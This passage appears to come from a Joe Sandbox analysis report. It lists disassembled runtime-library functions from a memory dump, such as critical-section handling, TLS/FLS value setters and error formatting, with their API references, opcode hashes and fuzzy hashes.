                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                              • Opcode ID: a34883132ee60a7a0e3e92ecfa04519025266e22849bdfec6dc3f932667f2681
                                                                                                                                                                                                                              • Instruction ID: b17da2ab7dd65384bf3cbbd323f646214fb1f62b0f0ce115015acd50ffd0e544
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a34883132ee60a7a0e3e92ecfa04519025266e22849bdfec6dc3f932667f2681
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28116032608B4582EB618F15E55025D77A0FB98BD8F584236FE8D47768DF3DD461CB00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE52F010 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _handle_error
                                                                                                                                                                                                                              • String ID: "$exp
                                                                                                                                                                                                                              • API String ID: 1757819995-2878093337
                                                                                                                                                                                                                              • Opcode ID: 9fdd603b76a48d23854c83fa128c3ec0a1d065c38e77db87c8ff278af7f6c3ee
                                                                                                                                                                                                                              • Instruction ID: c0100e41b4ac7739201eb7929ae4e0293ac64e9bad30045c833bb02b94b77b72
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fdd603b76a48d23854c83fa128c3ec0a1d065c38e77db87c8ff278af7f6c3ee
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A701A93A928A88C7E620CF24D4491AE7760FFFA744F201315F7452A660CB7ED0919B00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE4988E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFormatLastMessage_free_nolock
                                                                                                                                                                                                                              • String ID: system error %d
                                                                                                                                                                                                                              • API String ID: 3491801694-1688351658
                                                                                                                                                                                                                              • Opcode ID: 7e4d05fadd18b9b11f94f5c6425f15275c7a7fbc6ab491f3a12ea8099a6da99b
                                                                                                                                                                                                                              • Instruction ID: 52cca199e19ecd828c0312fde9773c97852f1c7f5c9819b7c557f2595d5148b5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e4d05fadd18b9b11f94f5c6425f15275c7a7fbc6ab491f3a12ea8099a6da99b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56010C32A18A8782E760DB51F45536EB3A0FB99784F40403AEA8D87A59DF3DD428CB00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE529A64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DefaultUsertry_get_function
                                                                                                                                                                                                                              • String ID: GetUserDefaultLocaleName
                                                                                                                                                                                                                              • API String ID: 3217810228-151340334
                                                                                                                                                                                                                              • Opcode ID: c694d8fed7e650d7ae902cf5b79a7869b30411a5ab2e26c2c3eb6ddf0b08f9ee
                                                                                                                                                                                                                              • Instruction ID: 7ac0c21c05e913ad5d248a249ac19baa92d78e8f1ee63cb7160125c4769032e2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c694d8fed7e650d7ae902cf5b79a7869b30411a5ab2e26c2c3eb6ddf0b08f9ee
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92F05E11B1C64A82FB289B95B6A05BC22A2AFFD7D0F444037F90E86B95CE2ED4748740
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE529AC8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6DE529AF9
                                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF6DE52D7C2,?,?,00000000,00007FF6DE52D6BA,?,?,?,00007FF6DE51B0BD), ref: 00007FF6DE529B13
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                                                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                                                                                                                                                              • API String ID: 539475747-3084827643
                                                                                                                                                                                                                              • Opcode ID: e01acae747cdeda195b10ee82353d8871bdea6c8613bfa92815bb754a0d07925
                                                                                                                                                                                                                              • Instruction ID: e26c8e1c0a3e6834806b212bfdbd7a53842ba12828516a4cc758dd9340381032
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e01acae747cdeda195b10ee82353d8871bdea6c8613bfa92815bb754a0d07925
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9F03A25B1C74982FA248B45A5500AD2221AFACBC0F485037F95D83B55CE7ED8758740
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE529828 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6DE529851
                                                                                                                                                                                                                              • TlsSetValue.KERNEL32(?,?,?,00007FF6DE52AB66,?,?,?,00007FF6DE51AF01,?,?,?,?,00007FF6DE5302A3), ref: 00007FF6DE529868
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Valuetry_get_function
                                                                                                                                                                                                                              • String ID: FlsSetValue
                                                                                                                                                                                                                              • API String ID: 738293619-3750699315
                                                                                                                                                                                                                              • Opcode ID: 30b8eb45ebde45efd7bf4f457bf1e11275edc514c445f36cbdbaff7140e65dd7
                                                                                                                                                                                                                              • Instruction ID: 7e6508929767b29e1ff9fca0351d1beeabb6c57c60ddeaaadbbf869f46d1ba48
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30b8eb45ebde45efd7bf4f457bf1e11275edc514c445f36cbdbaff7140e65dd7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38E0EDA1A08A4A91FA145B55F5645FD2222AFAD7C0F985037F91D8A395CE3EE878C700
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE47DEF0 Relevance: 5.1, APIs: 4, Instructions: 62COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DE46348C), ref: 00007FF6DE47DF1F
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DE46348C), ref: 00007FF6DE47DF83
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DE46348C), ref: 00007FF6DE47DFB9
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DE46348C), ref: 00007FF6DE47E003
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                                                              • Opcode ID: d7064577febaf475c7bb8ae2d0a4322ba4b58d71bdf70b5fad720353a296914f
                                                                                                                                                                                                                              • Instruction ID: c5ee54a9ae32405cecbac62ca98105af449f1c7e7dcfe7773c4a307e64185790
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7064577febaf475c7bb8ae2d0a4322ba4b58d71bdf70b5fad720353a296914f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F31EB3661DB8586DB618B1AE45526EBBA0F7D9B98F040166FECD47B29CE2CC1548B00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%